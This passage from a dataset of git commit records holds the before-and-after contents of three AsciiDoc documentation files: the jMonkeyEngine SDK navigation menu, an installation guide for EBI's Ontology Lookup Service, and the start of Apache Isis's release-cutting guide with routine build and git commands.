link:http:\/\/www.youtube.com\/watch?v=ntPAmtsQ6eM[Scene Composing]\n**** link:http:\/\/www.youtube.com\/watch?v=zgPV3W6dD4s[Terrain with Collision Shape]\n**** link:http:\/\/www.youtube.com\/watch?v=Feu3-mrpolc[Working with Materials]\n**** link:http:\/\/www.youtube.com\/watch?v=MNDiZ9YHIpM[Custom Controls]\n**** link:http:\/\/www.youtube.com\/watch?v=oZnssg8TBWQ[WebStart Deployment]\n**** link:http:\/\/www.youtube.com\/watch?v=D7JM4VMKqPc[Animation and Effect TrackEditing]\n** Getting Started\n*** xref:update_center.adoc[Updating jMonkeyEngine SDK]\n*** xref:troubleshooting.adoc[Troubleshooting]\n** Java Development Features\n*** xref:project_creation.adoc[Project Creation]\n*** xref:code_editor.adoc[Code Editor and Palette]\n*** xref:version_control.adoc[File Version Control]\n*** xref:debugging_profiling_testing.adoc[Debug, Profile, Test]\n*** xref:application_deployment.adoc[Application Deployment]\n**** xref:default_build_script.adoc[Default Build Script]\n**** xref:android.adoc[Android]\n**** xref:ios.adoc[iOS]\n** Unique Features\n*** xref:model_loader_and_viewer.adoc[Import, View, Convert Models]\n**** xref:asset_packs.adoc[Asset Packs]\n*** xref:scene_explorer.adoc[The SceneExplorer]\n*** xref:scene_composer.adoc[Composing a Scene]\n*** xref:terrain_editor.adoc[Terrain Editor]\n*** xref:sample_code.adoc[Sample Code]\n*** xref:material_editing.adoc[Material Editing]\n*** xref:font_creation.adoc[Creating Bitmap Fonts]\n*** link:https:\/\/hub.jmonkeyengine.org\/t\/effecttrack-and-audiotrack-editing-in-the-sdk\/23378[Audio and Effect Track Editing] \u00a0\n**** link:https:\/\/www.youtube.com\/watch?v=D7JM4VMKqPc[Video: Effect and AudioTrack editing in jMonkeyEngine 3 sdk]\n\/\/* <<sdk\/attachment_bones#,Animation and Attachment Bones Editing>>\n*** xref:filters.adoc[Post-Processor Filter Editor and Viewer]\n\/\/* <<sdk\/blender#,Blender Importer>>\n*** xref:ROOT:jme3\/advanced\/application_states.adoc[Application States]\n*** xref:ROOT:jme3\/advanced\/custom_controls.adoc[Custom Controls]\n*** xref:vehicle_creator.adoc[Vehicle Creator]\n** Advanced Usage\n*** xref:use_own_jme#.adoc[Using your own (modified) version of jME3 in jMonkeyEngine SDK]\n*** xref:development\/model_loader.adoc[Create a custom model importer]\n*** xref:increasing_heap_memory.adoc[Increasing Heap Memory]\n** Available external plugins\n*** xref:ROOT:jme3\/contributions.adoc[Contributions]\n*** xref:neotexture.adoc[Neo Texture Editor for procedural textures]\n*** link:http:\/\/www.youtube.com\/watch?v=yS9a9o4WzL8[Video: Mesh Tool & Physics Editor]\n** Development\n*** xref:build_platform.adoc[Building jMonkeyEngine SDK]\n*** xref:development.adoc[Developing plugins for jMonkeyEngine SDK]\n","old_contents":"* xref:sdk.adoc[SDK]\n** Video Tutorials\n*** SDK Use Case Tutorials\n**** link:http:\/\/www.youtube.com\/watch?v=-OzRZscLlHY[Demo 1 (Quixote demo)]\n**** link:http:\/\/www.youtube.com\/watch?v=6-YWxD3JByE[Demo 2 (Models and Materials)]\n*** SDK Tutorials\n**** link:http:\/\/www.youtube.com\/watch?v=M1_0pbeyJzI[Basics]\n**** link:http:\/\/www.youtube.com\/watch?v=nL7woH40i5c[Importing Models]\n**** link:http:\/\/www.youtube.com\/watch?v=DUmgAjiNzhY[Dragging&Dropping Nodes]\n**** link:http:\/\/www.youtube.com\/watch?v=ntPAmtsQ6eM[Scene Composing]\n**** link:http:\/\/www.youtube.com\/watch?v=zgPV3W6dD4s[Terrain with Collision Shape]\n**** link:http:\/\/www.youtube.com\/watch?v=Feu3-mrpolc[Working with Materials]\n**** link:http:\/\/www.youtube.com\/watch?v=MNDiZ9YHIpM[Custom Controls]\n**** link:http:\/\/www.youtube.com\/watch?v=oZnssg8TBWQ[WebStart Deployment]\n**** link:http:\/\/www.youtube.com\/watch?v=D7JM4VMKqPc[Animation and Effect TrackEditing]\n** Getting Started\n*** xref:update_center.adoc[Updating jMonkeyEngine SDK]\n*** xref:troubleshooting.adoc[Troubleshooting]\n** Java Development Features\n*** xref:project_creation.adoc[Project Creation]\n*** xref:code_editor.adoc[Code Editor and Palette]\n*** xref:version_control.adoc[File Version Control]\n*** xref:debugging_profiling_testing.adoc[Debug, Profile, Test]\n*** xref:application_deployment.adoc[Application Deployment]\n**** xref:default_build_script.adoc[Default Build Script]\n**** xref:android.adoc[Android]\n**** xref:ROOT:jme3\/ios.adoc[iOS]\n** Unique Features\n*** xref:model_loader_and_viewer.adoc[Import, View, Convert Models]\n**** xref:asset_packs.adoc[Asset Packs]\n*** xref:scene_explorer.adoc[The SceneExplorer]\n*** xref:scene_composer.adoc[Composing a Scene]\n*** xref:terrain_editor.adoc[Terrain Editor]\n*** xref:sample_code.adoc[Sample Code]\n*** xref:material_editing.adoc[Material Editing]\n*** xref:font_creation.adoc[Creating Bitmap Fonts]\n*** link:https:\/\/hub.jmonkeyengine.org\/t\/effecttrack-and-audiotrack-editing-in-the-sdk\/23378[Audio and Effect Track Editing] \u00a0\n**** link:https:\/\/www.youtube.com\/watch?v=D7JM4VMKqPc[Video: Effect and AudioTrack editing in jMonkeyEngine 3 sdk]\n\/\/* <<sdk\/attachment_bones#,Animation and Attachment Bones Editing>>\n*** xref:filters.adoc[Post-Processor Filter Editor and Viewer]\n\/\/* <<sdk\/blender#,Blender Importer>>\n*** xref:ROOT:jme3\/advanced\/application_states.adoc[Application States]\n*** xref:ROOT:jme3\/advanced\/custom_controls.adoc[Custom Controls]\n*** xref:vehicle_creator.adoc[Vehicle Creator]\n** Advanced Usage\n*** xref:use_own_jme#.adoc[Using your own (modified) version of jME3 in jMonkeyEngine SDK]\n*** xref:development\/model_loader.adoc[Create a custom model importer]\n*** xref:increasing_heap_memory.adoc[Increasing Heap Memory]\n** Available external plugins\n*** xref:ROOT:jme3\/contributions.adoc[Contributions]\n*** xref:neotexture.adoc[Neo Texture Editor for procedural textures]\n*** link:http:\/\/www.youtube.com\/watch?v=yS9a9o4WzL8[Video: Mesh Tool & Physics Editor]\n** Development\n*** xref:build_platform.adoc[Building jMonkeyEngine SDK]\n*** xref:development.adoc[Developing plugins for jMonkeyEngine SDK]\n","returncode":0,"stderr":"","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"e14af108868fa7d5bccd6284e2c0f75163977daf","subject":"Update installation-guide.adoc","message":"Update installation-guide.adoc","repos":"EBISPOT\/OLS,EBISPOT\/OLS,EBISPOT\/OLS,EBISPOT\/OLS","old_file":"ols-web\/src\/main\/asciidoc\/installation-guide.adoc","new_file":"ols-web\/src\/main\/asciidoc\/installation-guide.adoc","new_contents":"= Build a local Version of OLS\n:doctype: book\n:toc: left\n:toc-title: OLS Installation\n:sectanchors:\n:sectlinks:\n:toclevels: 4\n:source-highlighter: highlightjs\n\n[[Introduction]]\n== Introduction\nThe OLS (http:\/\/www.ebi.ac.uk\/ols ) aims to be a comprehensive collection of biomedical ontologies for the life sciences. OLS is open source and therefore can be downloaded and used for your own projects. This guide should help with the installation of a local version of OLS.\n\n\n== Premise: Software requirements\nIn order to be able to run OLS, there are some Software requirements that have to be fulfilled and therefore installed locally. There are multiple ways to install the relevant software and of course the exact way depends on the OS you use. For Mac OS one way to go is homebrew.\n\n|=======\n| *Software* | *Description* | *Installation with homebrew (OS X)*\n| java 1.8 | development language | _(no direct homebrew support)_\n| maven 3+ | dependency manager\/build environment | brew install maven\n| tomcat 7.5+ | webserver | brew install tomcat\n| mongodb (2.7.8+) | database | brew install mongodb\n| solr 5.2.1+ | Indxing\/search engine | brew install solr\n|=======\n\nNOTE: Java, maven, mongodb and solr should be available in the environment, so make sure the relevant environment variable is set! If you installed the software via a 'package manager', this might have been done automatically.\n\n== Obtaining the source code\nDownload the source code from the OLS github repository https:\/\/github.com\/EBISPOT\/OLS alternativly (if git is installed), you can of course clone the repository with `git clone https:\/\/github.com\/EBISPOT\/OLS.git`\n\n== Configurations\nThe default configuration for OLS can be found at `OLS\/ols-apps\/ols-config-importer\/src\/main\/resources\/ols-config.yaml`\n\nExample configuration file:\n**********************\n## EFO +\n# * are required fields\n\n*id:* efo \/\/ short unique id for the ontology * +\n*preferredPrefix:* EFO\t\/\/ preferred display name for the ontology +\n*title:* Experimental Factor Ontology \/\/ Short title of the ontology +\n*uri:* http:\/\/www.ebi.ac.uk\/efo \/\/ The ontology URI *\n*description:* \"The Experimental Factor Ontology (EFO) provides a...\" \/\/ Full ontology description +\n*ontology_purl:* http:\/\/www.ebi.ac.uk\/efo\/efo.owl \/\/ URL to get the ontology from * +\n*homepage:* http:\/\/www.ebi.ac.uk\/efo \/\/ homepage of the ontology +\n*mailing_list:* efo-users@lists.sourceforge.net \/\/ assocaited mailing list +\n*definition_property:* \/\/ predicates that are used for term definitions +\n -- http:\/\/www.ebi.ac.uk\/efo\/definition +\n*synonym_property:* \/\/ prediates used for synonyms +\n -- http:\/\/www.ebi.ac.uk\/efo\/alternative_term +\n*hierarchical_property:* \/\/ predicates that are hierarchical (like part of) will be included in default tree view +\n -- http:\/\/purl.obolibrary.org\/obo\/BFO_0000050 +\n -- http:\/\/purl.obolibrary.org\/obo\/RO_0002202 +\n*hidden_property:* \/\/ any predicates that should be ignored when indexing +\n -- http:\/\/www.ebi.ac.uk\/efo\/has_flag +\n*base_uri:* \/\/ base URIs for local terms +\n -- http:\/\/www.ebi.ac.uk\/efo\/EFO_ +\n*reasoner:* OWL2 \/\/ can be one of OWL2, EL, NONE - deafult is EL + \n*oboSlims:* false \/\/ contains OBO style slim annotations +\n**********************\n\nOLS is also able to import Yaml files following the OBO foundry specification. By default it will load the OBO config from the classpath. If you don't want the OBO ontologies delete or rename the obo-config.yaml file. You may also need to comment out the property from the `git\/OLS\/ols-apps\/ols-config-importer\/src\/main\/resources\/application.properties` file (`ols.obofoundry.ontology.config`)\nhttps:\/\/raw.githubusercontent.com\/OBOFoundry\/OBOFoundry.github.io\/master\/_config.yml\n\n== Building OLS\nYou can build your version of OLS by using maven. Go to your local OLS folder and execute\n\n`mvn clean install`\n\nAfter a successful build process, this should create target folders.\n\n\n== Initializing OLS (Loading and indexing resources\/ontologies)\n=== Loading the configuration files into MongoDB\nIn order to be able to load and index data in OLS, the MongoDB as well as Solr have to be available, so they need to be up and running. In contrast to that, the local tomcat server has to be down before running the `ols-indexer.jar`\n\nOLS uses mongodb to persist ontology configuration. To load the ontology configuration into your mongodb database, first make sure your mongo database is running.\n\nTo invoke the import process with different options, for example because you changed it, you can run the file ols-config-importer.jar (`java -jar ols-config-importer.jar`) in the folder `OLS\/ols-apps\/ols-config-importer\/target`.\n\nNOTE: OLS uses default mongo connection option. You can overide any of these by editing the application.properties file in the git\/OLS\/ols-apps\/ols-config-importer\/src\/main\/resources\/application.properties file.\n\n----------------\n# MONGODB (MongoProperties)\nspring.data.mongodb.authentication-database= # Authentication database name.\nspring.data.mongodb.database=test # Database name.\nspring.data.mongodb.field-naming-strategy= # Fully qualified name of the FieldNamingStrategy to use.\nspring.data.mongodb.grid-fs-database= # GridFS database name.\nspring.data.mongodb.host=localhost # Mongo server host.\nspring.data.mongodb.password= # Login password of the mongo server.\nspring.data.mongodb.port=27017 # Mongo server port.\nspring.data.mongodb.repositories.enabled=true # Enable Mongo repositories.\nspring.data.mongodb.uri=mongodb:\/\/localhost\/test # Mongo database URI. When set, host and port are ignored.\nspring.data.mongodb.username= # Login user of the mongo server.\n----------------\n\nAt this point the config should be loaded into your mongo db database called ols and a document collection called olsadmin.\n\nIf you need to update any config or reload the config, simply re-run the config-loader.jar as required.\n\n=== Building the Neo4J and SOLR indexes\nOLS provides a single application for indexing ontologies. When run this program does a few things:\n\n---\n\n1. Read ontologies from the config loaded into the MongoDB\n2. Download each file to a local directory\na. If this is the first time it will set the ontology status to 'TO LOAD' in the mongo database.\nb. If this is run a subsequent time it will check the latest download to the last file it downloaded. If these files are different it will set the ontology status 'TOLOAD' in the mongo database.\n3. All ontologies in the mongo database that have status 'TOLOAD' will get stored in both the SOLR and Neo4J index. Any older versions indexed will be deleted first.\n\n---\n\nFor this to work you need to make sure your Mongo and SOLR servers are running. You don't need a Neo4J server as OLS uses an embedded Neo4J database. If you already have a tomcat server running with OLS deployed and it is using the same index files as SOLR and Neo4J, it is advised to shutdown the tomcat before running this script.\n\nTo invoke the indexer process you can run the file ols-loading-app.jar (`java -jar ols-loading-app.jar`) in the folder OLS\/ols-apps\/ols-loading-app\/target.\n\nThis script has two optional arguments:\n\n* -f <list of ontologies> : Used to force the reload of a particular ontology\n* -off : Used to run in offline mode, ontologies will not be downloaded from the Web.\n\nAdditional configuration can be specified in the `application.properties` file before compilation or using the ``-D<propertyname>=<value>` at runtime.\n\n----------------\nspring.data.mongodb.database ols # mongo db name, default is ols\n\n# SOLR (SolrProperties)\nspring.data.solr.host=http:\/\/127.0.0.1:8983\/solr # Solr host. Ignored if \"zk-host\" is set.\nols.solr.search.core ontology\nols.solr.suggest.core autosuggest\n\n#Mongo DB properties same as above\n----------------\n\nBy default OLS will use ~\/.ols as the working directory for OLS where files will be downloaded and Neo4J indexes will be created. You can override this by setting the $OLS_HOME environment variable to a custom directory. You can also override this by passing the ``-Dols.home=` argument to any of the scripts.\n\nProviding this script has run successfully, you can rerun this script to update the OLS indexes. Each time you run it it will fetch the latest ontologies and only index the ones that have changed. Remember to shut down the tomcat before running this app.\n\n\n== Deploying the app on local server\nTo deploy OLS on the local server, it is necessary to copy certain .war files from the OLS-web target directory (`OLS\/ols-web\/target`) into the webapps folder of the local tomcat server. After starting tomcat (via `startup.sh` in the bin folder), there should be a local version of OLS running at http:\/\/localhost:8080\/ols-boot.\n\nAny configuration can be overridden using the same properties above. Put them in the application.properties file in the `ols-web\/src\/main\/resource\/application.properties` file before compiling that jar.\n","old_contents":"= Build a local Version of OLS\n:doctype: book\n:toc: left\n:toc-title: OLS Installation\n:sectanchors:\n:sectlinks:\n:toclevels: 4\n:source-highlighter: highlightjs\n\n[[Introduction]]\n== Introduction\nThe OLS (http:\/\/www.ebi.ac.uk\/ols ) aims to be a comprehensive collection of biomedical ontologies for the life sciences. OLS is open source and therefore can be downloaded and used for your own projects. This guide should help with the installation of a local version of OLS.\n\n\n== Premise: Software requirements\nIn order to be able to run OLS, there are some Software requirements that have to be fulfilled and therefore installed locally. There are multiple ways to install the relevant software and of course the exact way depends on the OS you use. For Mac OS one way to go is homebrew.\n\n|=======\n| *Software* | *Description* | *Installation with homebrew (OS X)*\n| java 1.8 | development language | _(no direct homebrew support)_\n| maven 3+ | dependency manager\/build environment | brew install maven\n| tomcat 7.5+ | webserver | brew install tomcat\n| mongodb (2.7.8+) | database | brew install mongodb\n| solr 5.2.1+ | Indxing\/search engine | brew install solr\n|=======\n\nNOTE: Java, maven, mongodb and solr should be available in the environment, so make sure the relevant environment variable is set! If you installed the software via a 'package manager', this might have been done automatically.\n\n== Obtaining the source code\nDownload the source code from the OLS github repository https:\/\/github.com\/EBISPOT\/OLS alternativly (if git is installed), you can of course clone the repository with `git clone https:\/\/github.com\/EBISPOT\/OLS.git`\n\n== Configurations\nThe default configuration for OLS can be found at `OLS\/ols-apps\/ols-config-importer\/src\/main\/resources\/ols-config.yaml`\n\nExample configuration file:\n**********************\n## EFO +\n# * are required fields\n\n*id:* efo \/\/ short unique id for the ontology * +\n*preferredPrefix:* EFO\t\/\/ preferred display name for the ontology +\n*title:* Experimental Factor Ontology \/\/ Short title of the ontology +\n*uri:* http:\/\/www.ebi.ac.uk\/efo \/\/ The ontology URI *\n*description:* \"The Experimental Factor Ontology (EFO) provides a...\" \/\/ Full ontology description +\n*ontology_purl:* http:\/\/www.ebi.ac.uk\/efo\/efo.owl \/\/ URL to get the ontology from * +\n*homepage:* http:\/\/www.ebi.ac.uk\/efo \/\/ homepage of the ontology +\n*mailing_list:* efo-users@lists.sourceforge.net \/\/ assocaited mailing list +\n*definition_property:* \/\/ predicates that are used for term definitions +\n -- http:\/\/www.ebi.ac.uk\/efo\/definition +\n*synonym_property:* \/\/ prediates used for synonyms +\n -- http:\/\/www.ebi.ac.uk\/efo\/alternative_term +\n*hierarchical_property:* \/\/ predicates that are hierarchical (like part of) will be included in default tree view +\n -- http:\/\/purl.obolibrary.org\/obo\/BFO_0000050 +\n -- http:\/\/purl.obolibrary.org\/obo\/RO_0002202 +\n*hidden_property:* \/\/ any predicates that should be ignored when indexing +\n -- http:\/\/www.ebi.ac.uk\/efo\/has_flag +\n*base_uri:* \/\/ base URIs for local terms +\n -- http:\/\/www.ebi.ac.uk\/efo\/EFO_ +\n*reasoner:* OWL2 \/\/ can be one of OWL2, EL, NONE - deafult is EL\n*isInferred:* false \/\/ if true no reasoner will be used +\n*oboSlims:* false \/\/ contains OBO style slim annotations +\n**********************\n\nOLS is also able to import Yaml files following the OBO foundry specification. By default it will load the OBO config from the classpath. If you don't want the OBO ontologies delete or rename the obo-config.yaml file. You may also need to comment out the property from the `git\/OLS\/ols-apps\/ols-config-importer\/src\/main\/resources\/application.properties` file (`ols.obofoundry.ontology.config`)\nhttps:\/\/raw.githubusercontent.com\/OBOFoundry\/OBOFoundry.github.io\/master\/_config.yml\n\n== Building OLS\nYou can build your version of OLS by using maven. Go to your local OLS folder and execute\n\n`mvn clean install`\n\nAfter a successful build process, this should create target folders.\n\n\n== Initializing OLS (Loading and indexing resources\/ontologies)\n=== Loading the configuration files into MongoDB\nIn order to be able to load and index data in OLS, the MongoDB as well as Solr have to be available, so they need to be up and running. In contrast to that, the local tomcat server has to be down before running the `ols-indexer.jar`\n\nOLS uses mongodb to persist ontology configuration. To load the ontology configuration into your mongodb database, first make sure your mongo database is running.\n\nTo invoke the import process with different options, for example because you changed it, you can run the file ols-config-importer.jar (`java -jar ols-config-importer.jar`) in the folder `OLS\/ols-apps\/ols-config-importer\/target`.\n\nNOTE: OLS uses default mongo connection option. You can overide any of these by editing the application.properties file in the git\/OLS\/ols-apps\/ols-config-importer\/src\/main\/resources\/application.properties file.\n\n----------------\n# MONGODB (MongoProperties)\nspring.data.mongodb.authentication-database= # Authentication database name.\nspring.data.mongodb.database=test # Database name.\nspring.data.mongodb.field-naming-strategy= # Fully qualified name of the FieldNamingStrategy to use.\nspring.data.mongodb.grid-fs-database= # GridFS database name.\nspring.data.mongodb.host=localhost # Mongo server host.\nspring.data.mongodb.password= # Login password of the mongo server.\nspring.data.mongodb.port=27017 # Mongo server port.\nspring.data.mongodb.repositories.enabled=true # Enable Mongo repositories.\nspring.data.mongodb.uri=mongodb:\/\/localhost\/test # Mongo database URI. When set, host and port are ignored.\nspring.data.mongodb.username= # Login user of the mongo server.\n----------------\n\nAt this point the config should be loaded into your mongo db database called ols and a document collection called olsadmin.\n\nIf you need to update any config or reload the config, simply re-run the config-loader.jar as required.\n\n=== Building the Neo4J and SOLR indexes\nOLS provides a single application for indexing ontologies. When run this program does a few things:\n\n---\n\n1. Read ontologies from the config loaded into the MongoDB\n2. Download each file to a local directory\na. If this is the first time it will set the ontology status to 'TO LOAD' in the mongo database.\nb. If this is run a subsequent time it will check the latest download to the last file it downloaded. If these files are different it will set the ontology status 'TOLOAD' in the mongo database.\n3. All ontologies in the mongo database that have status 'TOLOAD' will get stored in both the SOLR and Neo4J index. Any older versions indexed will be deleted first.\n\n---\n\nFor this to work you need to make sure your Mongo and SOLR servers are running. You don't need a Neo4J server as OLS uses an embedded Neo4J database. If you already have a tomcat server running with OLS deployed and it is using the same index files as SOLR and Neo4J, it is advised to shutdown the tomcat before running this script.\n\nTo invoke the indexer process you can run the file ols-loading-app.jar (`java -jar ols-loading-app.jar`) in the folder OLS\/ols-apps\/ols-loading-app\/target.\n\nThis script has two optional arguments:\n\n* -f <list of ontologies> : Used to force the reload of a particular ontology\n* -off : Used to run in offline mode, ontologies will not be downloaded from the Web.\n\nAdditional configuration can be specified in the `application.properties` file before compilation or using the ``-D<propertyname>=<value>` at runtime.\n\n----------------\nspring.data.mongodb.database ols # mongo db name, default is ols\n\n# SOLR (SolrProperties)\nspring.data.solr.host=http:\/\/127.0.0.1:8983\/solr # Solr host. Ignored if \"zk-host\" is set.\nols.solr.search.core ontology\nols.solr.suggest.core autosuggest\n\n#Mongo DB properties same as above\n----------------\n\nBy default OLS will use ~\/.ols as the working directory for OLS where files will be downloaded and Neo4J indexes will be created. You can override this by setting the $OLS_HOME environment variable to a custom directory. You can also override this by passing the ``-Dols.home=` argument to any of the scripts.\n\nProviding this script has run successfully, you can rerun this script to update the OLS indexes. Each time you run it it will fetch the latest ontologies and only index the ones that have changed. Remember to shut down the tomcat before running this app.\n\n\n== Deploying the app on local server\nTo deploy OLS on the local server, it is necessary to copy certain .war files from the OLS-web target directory (`OLS\/ols-web\/target`) into the webapps folder of the local tomcat server. After starting tomcat (via `startup.sh` in the bin folder), there should be a local version of OLS running at http:\/\/localhost:8080\/ols-boot.\n\nAny configuration can be overridden using the same properties above. Put them in the application.properties file in the `ols-web\/src\/main\/resource\/application.properties` file before compiling that jar.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"844bfd7a5d6e4c0e8b0238fc4999629cd086ef64","subject":"ISIS-2450: minor fix to release docs","message":"ISIS-2450: minor fix to release docs\n","repos":"apache\/isis,apache\/isis,apache\/isis,apache\/isis,apache\/isis,apache\/isis","old_file":"antora\/components\/comguide\/modules\/ROOT\/pages\/cutting-a-release.adoc","new_file":"antora\/components\/comguide\/modules\/ROOT\/pages\/cutting-a-release.adoc","new_contents":"= Cutting a Release\n\n:Notice: Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding copyright ownership. The ASF licenses this file to you under the Apache License, Version 2.0 (the \"License\"); you may not use this file except in compliance with the License. You may obtain a copy of the License at. http:\/\/www.apache.org\/licenses\/LICENSE-2.0 . Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.\n:page-partial:\n\n\nThe release process consists of:\n\n* the release manager cutting the release (documented below)\n* Members of the Apache Isis PMC xref:comguide:ROOT:verifying-releases.adoc[verifying] and voting on the release\n* the release manager performing post-release tasks, for either a xref:comguide:ROOT:post-release-successful.adoc[successful] or an xref:comguide:ROOT:post-release-unsuccessful.adoc[unsuccessful] vote.\n\nApache Isis itself is released in one go, everything is ultimately a child of `isis-parent\/pom.xml` (relative to the link:https:\/\/github.com\/apache\/isis[source code root]).\nThis section details the process for formally releasing this module.\n\nThe subsequent sections describe how other committers can xref:comguide:ROOT:verifying-releases.adoc[verify a release] and how the release manager can then perform xref:comguide:ROOT:post-release-successful.adoc[post-release] activities and set up for the next development iteration.\n\nIf you've not performed a release before, then note that there are some configuration xref:comguide:ROOT:release-process-prereqs.adoc[prerequisites] that must be configured first.\nIn particular, you'll need signed public\/private keys, and the ASF Nexus staging repo inlocal `~\/.m2\/settings.xml` file.\n\nThese release notes using bash command line tools.\nThey should work on Linux and MacOS; for Windows, use mSysGit.\n\n\n== Preparation\n\n=== Obtain Consensus\n\nBefore releasing the framework, ensure there is consensus on the xref:docs:support:mailing-list.adoc[dev mailing list] that this is the right time for a release.\nThe discussion should include confirming the version number to be used, and to confirm content.\n\nThese discussions should also confirm the version number of the module being released.\nThis should be in line with our xref:comguide:ROOT:policies\/versioning-policy.adoc#semantic-versioning[semantic versioning policy].\n\nMake sure you have a JIRA ticket open against which to perform all commits.\nIn most cases a JIRA ticket will have been created at the beginning of the previous release cycle.\n\n\n=== Pull down code to release\n\nSet the HEAD of your local git repo to the commit to be released.\nThis will usually be the tip of the origin's `master` branch:\n\n[source,bash,subs=\"attributes+\"]\n----\ngit checkout master\ngit pull --ff-only\n----\n\n\n=== License headers\n\nThe Apache Release Audit Tool `RAT` (from the http:\/\/creadur.apache.org[Apache Creadur] project) checks for missing license header files.\nThe parent `pom.xml` of each releasable module specifies the RAT Maven plugin, with a number of custom exclusions.\n\nTo run the RAT tool, use:\n\n[source,bash,subs=\"attributes+\"]\n.find unapproved\/missing licenses\n----\nmvn clean\n\npushd isis-parent\nmvn org.apache.rat:apache-rat-plugin:check -D rat.numUnapprovedLicenses=1000 -Dreleased -P'!all'\npopd\n\nfor a in `\/bin\/find . -name rat.txt -print`; do grep '!???' $a; done > \/tmp\/rat-qn.txt\nfor a in `\/bin\/find . -name rat.txt -print`; do grep '!AL' $a; done > \/tmp\/rat-al.txt\n----\n\nNOTE: the parent `pom.xml` in each of these locations has the `apache-rat-plugin` appropriately configured.\n\nThis script runs over all submodules, including non-released modules.\n\nThe command writes out a `target\\rat.txt` for each submodule. missing license notes are indicated using the key `!???`.\nThe `for` command collates all the errors.\n\nInvestigate and fix any reported violations, typically by either:\n\n* adding genuinely missing license headers from Java (or other) source files, or\n* updating the `<excludes>` element for the `apache-rat-plugin` plugin to ignore test files, log files and any other non-source code files\n* also look to remove any stale `<exclude>` entries\n\nOnce you've fixed all issues, run the script again to confirm that all license violations have been fixed.\n\n=== Missing License Check\n\nAlthough Apache Isis has no dependencies on artifacts with incompatible licenses, the POMs for some of these dependencies (in the Maven central repo) do not necessarily contain the required license information.\nWithout appropriate additional configuration, this would result in the generated `DEPENDENCIES` file and generated Maven site indicating dependencies as having \"unknown\" licenses.\n\nFortunately, Maven allows the missing information to be provided by configuring the `maven-remote-resources-plugin`.\nThis is stored in the `src\/main\/appended-resources\/supplemental-models.xml` file, relative to the root of each releasable module.\n\nIt's first necessary to have built the framework locally at least once.\n\nIn the root directory:\n\n[source,bash,subs=\"attributes+\"]\n----\nmvn clean install -o\n----\n\nOnce this is done, capture the missing license information using:\n\n[source,bash,subs=\"attributes+\"]\n----\nmvn license:download-licenses\ngroovy scripts\/checkmissinglicenses.groovy\n----\n\n\nThe Maven plugin creates a `license.xml` file in the `target\/generated-resources` directory of each module.\nThe script then searches for these `licenses.xml` files, and compares them against the contents of the `supplemental-models.xml` file.\n\nFor example, the output could be something like:\n\n[source,bash,subs=\"attributes+\"]\n----\nlicenses to add to supplemental-models.xml:\n\n[org.slf4j, slf4j-api, 1.5.7]\n[org.codehaus.groovy, groovy-all, 1.7.2]\n\nlicenses to remove from supplemental-models.xml (are spurious):\n\n[org.slf4j, slf4j-api, 1.5.2]\n----\n\nIf any missing entries are listed or are spurious, then update `supplemental-models.xml` and try again.\n\n\n=== Update and preview website\n\nGenerate the website, ensuring that the config, examples, projdoc (system overview and global index) are all updated:\n\n[source,bash,subs=\"attributes+\"]\n----\nsh preview.sh\n----\n\nCheck for any Asciidoc errors, and fix.\n\n\n=== Commit changes\n\nCommit any changes from the preceding steps:\n\n[source,bash,subs=\"attributes+\"]\n----\ngit add ..\ngit commit -m \"$ISISJIRA: updates to pom.xml etc for release\"\n----\n\n\n== Releasing the Framework\n\n=== Set environment variables\n\nWe use environment variables to parameterize as many of the steps as possible.\nFor example:\n\n[source,bash,subs=\"attributes+\"]\n----\nexport ISISJIRA=ISIS-9999 # <.>\nexport ISISTMP=\/c\/tmp # <.>\nexport ISISREL={page-isisrel} # <.>\nexport ISISRC=RC1 # <.>\nexport ISISBRANCH=release-$ISISREL-$ISISRC\nexport ISISART=isis\nenv | grep ISIS | sort\n----\n<.> set to an \"umbrella\" ticket for all release activities.\n(One should exist already, xref:comguide:ROOT:post-release-successful.adoc#create-new-jira[created at] the beginning of the development cycle now completing).\n<.> adjust by platform\n<.> adjust as required\n<.> adjust as necessary if this is not the first attempt to release\n\n\n[IMPORTANT]\n====\nThe branch name is intentionally *not* the same as the eventual tag names (eg `isis-{page-isisrel}`).\n====\n\n\n=== Create a release branch and worktree\n\nThe release is performed on a branch; if we are successful, this branch will be merged back into master.\n\nWe also recommend performing this work in a separate git worktree.\nThe original worktree can stay with the `master` branch and be used for documentation fixes, etc.\n\n* create (but don't checkout) a release branch for the version number being released; eg:\n+\n[source,bash,subs=\"attributes+\"]\n----\ngit branch $ISISBRANCH\n----\n\n* Create a worktree for this branch:\n+\n[source,bash,subs=\"attributes+\"]\n----\ngit worktree add ..\/isis-release $ISISBRANCH\n----\n\n* Switch to the new worktree and push the branch:\n+\n[source,bash,subs=\"attributes+\"]\n----\ncd ..\/isis-release\ngit push origin $ISISBRANCH -u\n----\n\n* Finally switch to the `isis-parent` directory:\n+\n[source,bash,subs=\"attributes+\"]\n----\ncd isis-parent\n----\n\n=== Bump code to `$ISISREL`\n\nSearch through the `.java` files for `{page-isisprev}`, and change to `{page-isisrel}`.\n\n=== Bump projects to `$ISISREL`\n\nWe use `mvn versions:set` to manually bump the release version:\n\n[source,bash,subs=\"attributes+\"]\n----\nmvn versions:set -DnewVersion=$ISISREL\nmvn install -o -DskipTests\n\npushd ..\/starters\nmvn versions:set -DnewVersion=$ISISREL\npopd\n\ngit add ..\ngit commit -m \"$ISISJIRA: bumps version to $ISISREL\"\n----\n\nNOTE: After release, there is a xref:comguide:ROOT:cutting-a-release.adoc#reset-revision-property[similar step at the end] to reset back to `2.0.0-SNAPSHOT`.\n\n\n=== Sanity check\n\nPerform one last sanity check on the codebase.\nDelete all Isis artifacts from your local Maven repo, then build using the `-o` offline flag:\n\n[source,bash,subs=\"attributes+\"]\n----\nrm -rf ~\/.m2\/repository\/org\/apache\/isis\nmvn clean install -o -Dreleased -P'!all'\n----\n\n[NOTE]\n====\nThe `released` system property is set to only sanity check the modules actually to be released (ignores the incubator modules).\n\nPartly that's because there's no need to check the incubator modules, it's also because the incubator modules require Java 11 (Java 8 is used for everything else)\n====\n\n\n=== Deploy\n\nSince the `<version>` has already been updated, we just use `mvn deploy` to upload the artifacts.\nWe activate the (inherited) `apache-release` profile to bring in the `gpg` plugin for code signing.\n\nThe build creates a zip of the directory, so 